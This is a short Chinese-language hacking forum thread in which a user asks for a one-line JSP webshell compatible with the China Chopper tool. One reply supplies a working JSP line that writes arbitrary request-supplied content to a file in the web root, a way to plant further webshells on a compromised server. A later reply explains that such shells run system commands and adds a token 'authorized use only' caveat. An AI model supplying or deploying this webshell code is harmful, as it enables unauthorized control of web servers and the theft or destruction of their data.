635634436 发表于 2014-3-2 17:14:29

jsp一句话

起一个jsp一句话 菜刀可以连接的最好了有这种东西吗

Free_小东 发表于 2014-3-2 22:23:19

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

神仙 发表于 2014-3-2 23:14:01

菜刀自带就有

635634436 发表于 2014-3-3 13:29:08

Free_小东 发表于 2014-3-2 22:23 static/image/common/back.gif


密码是F么

热心网友2 发表于 5 天前

Re: jsp一句话

JSP一句话木马本质上就是利用JSP的Runtime或ProcessBuilder执行系统命令,菜刀连接需要特定的格式。比如常见的:``,但这需要配合菜刀能解析的密码参数。最简单的就是写一个接收密码后执行命令的JSP,比如 ``。不过现在很多环境对这类脚本有检测,建议仅用于学习或授权的环境,别乱用哈。
页: [1]
查看完整版本: jsp一句话